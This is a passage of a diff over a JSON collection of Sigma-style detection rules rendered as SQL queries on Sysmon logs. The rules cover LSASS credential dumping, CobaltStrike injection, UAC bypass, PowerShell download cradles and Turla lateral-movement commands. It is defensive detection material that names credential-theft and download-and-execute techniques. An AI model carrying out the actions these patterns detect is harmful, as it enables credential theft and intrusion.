"level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((Image LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR Image LIKE '%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_sourgrum.yml" + "filename": "create_stream_hash_susp_ip_domains.yml" }, { - "title": "Exploiting SetupComplete.cmd CVE-2019-1378", - "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", + "title": "Hidden Executable In NTFS Alternate Data Stream", + "id": "b69888d4-380c-45ce-9cf9-d9ce46e67821", "status": "test", - "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "description": "Detects the creation of an ADS (Alternate Data Stream) that contains an executable (non-empty imphash)", + "author": "Florian Roth (Nextron Systems), @0xrawsec", "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.execution", - "attack.t1059.003", - "attack.t1574", - "cve.2019.1378" + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Hash LIKE '%IMPHASH=%' ESCAPE '\\' AND NOT (Hash LIKE '%IMPHASH=00000000000000000000000000000000%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2019_1378.yml" + "filename": "create_stream_hash_ads_executable.yml" }, { - "title": "Regasm/Regsvcs Suspicious Execution", - "id": "cc368ed0-2411-45dc-a222-510ace303cb2", + "title": "HandleKatz Duplicating LSASS Handle", + "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", "status": "experimental", - "description": "Detects suspicious execution of Regasm/Regsvcs utilities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", + "author": "Bhabesh Raj (rule), @thefLinkk", "tags": [ + "attack.execution", + "attack.t1106", "attack.defense_evasion", - "attack.t1218.009" + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_regasm.yml" + "filename": "proc_access_win_handlekatz_lsass_access.yml" }, { - "title": "Suspect Svchost Activity", - "id": "16c37b52-b141-42a5-a3ea-bbe098444397", + "title": "Direct Syscall of NtOpenProcess", + "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", "status": "experimental", - "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", - "author": "David Burkett, @signalblur", + "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", + "author": "Christian Burkard (Nextron Systems), Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" + "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" }, { - "title": "PUA - Nimgrab Execution", - "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", - "status": "experimental", - "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", - "author": "frack113", + "title": "UAC Bypass Using WOW64 Logger DLL Hijack", + "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use of Nim on a developer systems" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" - ], - "filename": "proc_creation_win_pua_nimgrab.yml" - }, - { - "title": "PowerShell Web Download", - "id": "6e897651-f157-4d8f-aaeb-df8151488385", - "status": "experimental", - "description": "Detects suspicious ways to download files or content using PowerShell", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Scripts or tools that download files" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_download_cradles.yml" + "filename": "proc_access_win_uac_bypass_wow64_logger.yml" }, { - "title": "DLL Execution via Rasautou.exe", - "id": "cd3d1298-eb3b-476c-ac67-12847de55813", + "title": "CobaltStrike BOF Injection Pattern", + "id": "09706624-b7f6-455d-9d02-adee024cee1d", "status": "test", - "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", - "author": "Julia Fomina, oscd.community", + "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", + "author": "Christian Burkard (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1106", "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rasautou.exe' ESCAPE '\\' OR OriginalFileName = 'rasdlui.exe') AND (CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" ], - "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml" + "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" }, { - "title": "Renamed MegaSync Execution", - "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "title": "Load Undocumented Autoelevated COM Interface", + "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", "status": "test", - "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", - "author": "Sittikorn S", + "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Software that illegally integrates MegaSync in a renamed form", - "Administrators that have renamed MegaSync" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'megasync.exe' AND NOT (Image LIKE '%\\\\megasync.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_megasync.yml" + "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" }, { - "title": "Application Whitelisting Bypass via Bginfo", - "id": "aaf46cdc-934e-4284-b329-34aa701e3771", - "status": "test", - "description": "Execute VBscript code that is referenced within the *.bgi file.", - "author": "Beyu Denis, oscd.community", + "title": "Rare GrantedAccess Flags on LSASS Access", + "id": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", + "status": "experimental", + "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Legitimate software accessing LSASS process for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\bginfo.exe' ESCAPE '\\' AND CommandLine LIKE '%/popup%' ESCAPE '\\' AND CommandLine LIKE '%/nolicprompt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess LIKE '%10' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\')) OR (SourceCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\wermgr.exe -upload' ESCAPE '\\') OR (SourceImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\xampp-control.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x10'))))" ], - "filename": "proc_creation_win_lolbin_bginfo.yml" + "filename": "proc_access_win_rare_proc_access_lsass.yml" }, { - "title": "Suspicious Extrac32 Alternate Data Stream Execution", - "id": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", + "title": "Credential Dumping by Pypykatz", + "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", "status": "test", - "description": "Extract data from cab file and hide it in an alternate data stream", - "author": "frack113", + "description": "Detects LSASS process access by pypykatz for credential dumping.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_lolbin_extrac32_ads.yml" + "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" }, { - "title": "Turla Group Lateral Movement", - "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", + "title": "LSASS Memory Access by Tool Named Dump", + "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", "status": "test", - "description": "Detects automated lateral movement by Turla group", - "author": "Markus Neis", + "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059", - "attack.lateral_movement", - "attack.t1021.002", - "attack.discovery", - "attack.t1083", - "attack.t1135" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Rare programs that contain the word dump in their name and access lsass" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_turla_commands_critical.yml" + "filename": "proc_access_win_lsass_memdump_indicators.yml" }, { - "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", + "title": "Potential NT API Stub Patching", + "id": "b916cba1-b38a-42da-9223-17114d846fd6", "status": "experimental", - "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential NT API stub patching as seen used by the project PatchingAPI", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE 